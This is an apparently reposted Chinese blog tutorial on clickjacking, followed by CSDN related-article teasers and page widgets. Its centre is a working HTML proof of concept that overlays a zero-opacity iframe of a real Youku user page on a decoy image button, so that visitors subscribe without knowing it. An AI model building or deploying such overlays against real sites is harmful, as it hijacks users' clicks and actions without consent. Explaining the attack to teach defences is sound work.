web漏洞之点击劫持

最新推荐文章于 2024-07-16 10:30:27 发布
最新推荐文章于 2024-07-16 10:30:27 发布
阅读量665 收藏 1
点赞数
分类专栏: 点击劫持 文章标签: web漏洞
原文链接:https://blog.csdn.net/qq_32523587/article/details/79613768
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接: https://blog.csdn.net/qq_32523587/article/details/79613768


百度解释:

点击劫持, clickjacking,也被称为UI-覆盖攻击。这个词首次出现在2008年,是由 互联网安全专家罗伯特·汉森和耶利米·格劳斯曼首创的。
它是通过覆盖不可见的框架误导受害者点击。
虽然受害者点击的是他所看到的网页,但其实他所点击的是被黑客精心构建的另一个置于原网页上面的透明页面。
这种攻击利用了HTML中<iframe>标签的透明属性。

就像一张图片上面铺了一层透明的纸一样,你看到的是黑客的页面,但是其实这个页面只是在底部,而你真正点击的是被黑客透明化的另一个网页。一个简单的点击劫持例子,就是当你点击了一个不明链接之后,自动关注了某一个人的博客或者订阅了视频。
假如我在优酷发布了很多视频,想让更多的人关注它,于是我们准备了一个页面: 

  
  
  1. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      <!DOCTYPE html>
     
     
    
    
    
  2. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      <html>
     
     
    
    
    
  3. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
     
     
    
    
    
  4. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      <head>
     
     
    
    
    
  5. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      <title>点击劫持 POC
      
      </title>
     
     
    
    
    
  6. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      <style>
      
      
     
     
    
    
    
  7. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      iframe {
     
     
    
    
    
  8. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      width: 
      
      1440px;
     
     
    
    
    
  9. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      height: 
      
      900px;
     
     
    
    
    
  10. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      position: absolute;
     
     
    
    
    
  11. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      top: -
      
      0px;
     
     
    
    
    
  12. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      left: -
      
      0px;
     
     
    
    
    
  13. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      z-index: 
      
      2;
     
     
    
    
    
  14. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      -moz-opacity: 
      
      0;
     
     
    
    
    
  15. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      opacity: 
      
      0;
     
     
    
    
    
  16. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      filter: 
      
      alpha(opacity=0);
     
     
    
    
    
  17. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      }
     
     
    
    
    
  18. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      button {
     
     
    
    
    
  19. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      position: absolute;
     
     
    
    
    
  20. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      top: 
      
      270px;
     
     
    
    
    
  21. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      left: 
      
      1150px;
     
     
    
    
    
  22. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      z-index: 
      
      1;
     
     
    
    
    
  23. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      width: 
      
      90px;
     
     
    
    
    
  24. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      height:
      
      40px;
     
     
    
    
    
  25. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      }
     
     
    
    
    
  26. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      </style>
     
     
    
    
    
  27. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      </head>
     
     
    
    
    
  28. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      <body>
     
     
    
    
    
  29. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      <button>美女图片
      
      </button>
     
     
    
    
    
  30. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      <img src="http://pic1.win4000.com/wallpaper/2018-03-19/5aaf2bf0122d2.jpg">
     
     
    
    
    
  31. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      <iframe src="http://i.youku.com/u/UMjA0NTg4Njcy" scrolling="no">
      
      </iframe>
     
     
    
    
    
  32. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      </body>
     
     
    
    
    
  33. 
    
    
    
     
     
    
    
    
    
    
    
    
     
     
    
      
      </html>



当然真正的页面肯定会更精致一些,不会这么简陋。

然而这个页面只是表象而已,我们把iframe的透明度改成0.3以后再看看


当你点击按钮以后,真正的点击的其实是隐藏的那个页面的订阅按钮,然后就会在你不知情的情况下订阅了


当然点击劫持的危害可大可小,并不仅仅是关注订阅之类的东西,但是原理类似。
小 白 渣
关注
专栏目录
Web安全】点击劫持漏洞
做自己喜欢的事,并将其发挥到极致!
11-25 1348
本篇文章主要介绍点击劫持漏洞原理、危害以及验证方式,切勿将文中攻击手法用于非授权下渗透攻击行为!!!点击劫持(Click Jacking),是一种视觉上的欺骗手段,也被称为UI-覆盖攻击。攻击者通过使用一个透明的iframe,覆盖在一个网页上,然后诱使用户在该页面上进行操作,通过调整iframe页面的位置,可以使得伪造的页面恰好和iframe里受害页面里的一些功能重合(点击按钮或活动选项),以达到窃取用户信息或者劫持用户操作的目的。
Web安全之点击劫持(ClickJacking)
墨痕诉清风的博客
03-14 679
目录 iframe覆盖 直接示例说明 解决办法 Apache配置: nginx配置: IIS配置: 图片覆盖 示例 解决办法 总结 点击劫持(ClickJacking)是一种视觉上的欺骗手段。大概有两种方式,一是攻击者使用一个透明的iframe,覆盖在一个网页上,然后诱使用户在该页面上进行操作,此时用户将在不知情的情况下点击透明的iframe页面;二是攻击者使用一张图片覆盖在网页,遮挡网页原有位置的含义; iframe覆盖 直接示例说明 1. 假如我们在百度有个贴吧,想偷偷让
web安全之点击劫持(clickjacking)
热门推荐
infi
03-19 1万+
百度解释: 点击劫持,clickjacking,也被称为UI-覆盖攻击。这个词首次出现在2008年,是由互联网安全专家罗伯特·汉森和耶利米·格劳斯曼首创的。 它是通过覆盖不可见的框架误导受害者点击。 虽然受害者点击的是他所看到的网页,但其实他所点击的是被黑客精心构建的另一个置于原网页上面的透明页面。 这种攻击利用了HTML中标签的透明属性。 就像一张图片上
Web 安全之点击劫持(Clickjacking)攻击详解_点击劫持攻击
最新发布
2401_85773496的博客
07-16 1107
点击劫持(Clickjacking)攻击,又称为界面伪装攻击,是一种利用视觉欺骗手段进行攻击的方式。攻击者通过技术手段欺骗用户点击本没有打算点击的位置,当用户在被攻击者攻击的页面上进行操作时,实际点击结果被劫持,从而被攻击者利用。这种攻击方式利用了用户对网站的信任,通过覆盖层(通常是透明的iframe)覆盖在另一个网页之上,使受害者无法察觉。
浅析点击劫持攻击(转载)
bnrmaster的博客
10-28 1295
转载地址:http://www.freebuf.com/articles/web/67843.html 主要是想做下资料记录,其实看过后就知道原理很简单,先感谢下原作者,如果有侵权等行为,请告知,我会立即删除 点击劫持(click jacking)估计搞安全的都对这四个字不陌生,一句话描述这种劫持:利用社工搭配目标站的不安全配置对用户造成危害。这种漏洞目前在国内
Web 安全之点击劫持(Clickjacking)攻击详解
路多辛的所思所想
01-27 2250
点击劫持(Clickjacking)攻击,又称为界面伪装攻击,是一种利用视觉欺骗手段进行攻击的方式。攻击者通过技术手段欺骗用户点击本没有打算点击的位置,当用户在被攻击者攻击的页面上进行操作时,实际点击结果被劫持,从而被攻击者利用。这种攻击方式利用了用户对网站的信任,通过覆盖层(通常是透明的iframe)覆盖在另一个网页之上,使受害者无法察觉。
点击劫持:潜在有害的网页浏览器漏洞利用
Purpleendurer@CSDN
11-19 4821
Clickjacking: Potentially harmful Web browser exploit点击劫持:潜在有害的网页浏览器漏洞利用 Author: Michael Kassner作者:Michael Kassner 翻译:endurer,2008-11-19 第一版 Category: General, security, News类别:常规,安全
WEB应用程序点击劫持漏洞研究及防御方法
12-11
web程序劫持漏洞及防御的方法。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
web漏洞-点击劫持:X-Frame-Options未设置-低危
Amdy_amdy的博客
07-26 2784
漏洞描述: 点击劫持(ClickJacking)是一种视觉上的欺骗手段。攻击者使用一个透明的、不可见的iframe,覆盖在一个网页上,然后诱使用户在该网页上进行操作,此时用户将在不知情的情况下点击透明的iframe页面。通过调整iframe页面的位置,可以诱使用户恰好点击在iframe页面的一些功能性按钮上。 HTTP 响应头信息中的X-Frame-Options,可以指示浏览器是否应该加载一...
信息安全之Web劫持与流量劫持法律治理研究.pdf
09-09
《信息安全之Web劫持与流量劫持法律治理研究》这篇文献深入探讨了当前网络空间中的两大安全威胁:Web劫持和流量劫持,并且聚焦于它们的法律治理问题。这是一篇结合技术与法规的深度分析,对于理解网络安全法律体系的...
web sercurity】之点击劫持漏洞
weixin_34198797的博客
06-11 414
2019独角兽企业重金招聘Python工程师标准>>> ...
点击劫持漏洞案例ppt
01-02
点击劫持---clickjacking
esapi-2.1.0.1.jar,OWASP的安全包包括ClickjackFilter(点击劫持
03-29
OWASP的安全包,包括ClickjackFilter,解决点击劫持,可以设置 X-Frame-Options 。只用了这,其它就不懂了。
点击劫持漏洞
大河之犬的博客
05-28 924
点击劫持攻击中,用户被欺骗点击网页上的一个不可见或伪装成不同元素的元素。这种操纵可能会对用户造成意外后果,如下载恶意软件,重定向到恶意网页,提供凭据或敏感信息,转账,或在线购买产品。
点击劫持漏洞 主机入侵防范
建伟博客
03-26 1739
点击劫持(click jacking)估计搞安全的都对这四个字不陌生,一句话描述这种劫持:利用社工搭配目标站的不安全配置对用户造成危害。这种漏洞目前在国内一直不被重视,但前一阵子Facebook和YouTube纷纷爆出点击劫持导致大问题的漏洞,国外才开始关注此问题,但国内依然不理不睬,看起来很容易的漏洞,但真的可以造成很大的危害,此文目的既在此。01 聊聊点击劫持看到上图的你们,是不是都会去选择点...
web安全——ClickJacking
Venscor技术养成之路
11-05 964
本篇主要是对自己学习web安全的过程总结,多数是看书和查资料所得,包含一些自己看书时疑惑的记录与思考,无干货。多数来自《白帽子讲web安全》一书,对于里面的思考,博客中以红色字体标出。注:博客中一些示图源自《白帽子讲web安全》一书。一、ClickJacking含义与危害1. 概述  ClickJacking,即点击劫持。通过对用户在视觉上的欺骗完成攻击,主要有CSS控制攻击向量。通过把被攻击网站(
常见的web攻击方式之clickjacking点击劫持
qq_16049879的博客
03-10 308
定义 点击劫持是一种视觉欺骗的攻击手段。 攻击者将需要攻击的网站通过frame嵌套的方式嵌入自己的网页中,并将 iframe设置为透明,在页面中透出一个按钮诱导用户点击。 模拟攻击 登录http://localhost:4000/clickjacking.html <!DOCTYPE html> <html lang="en"> <head> &...
nginx点击劫持漏洞修复
05-10
点击劫持是一种常见的 Web 安全漏洞,攻击者会将一个网站嵌入到另一个网站中,通过隐藏或者伪装的方式,欺骗用户去点击一个看似无害的链接,从而实现攻击者的恶意目的。nginx 本身并没有针对点击劫持的专门防御机制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值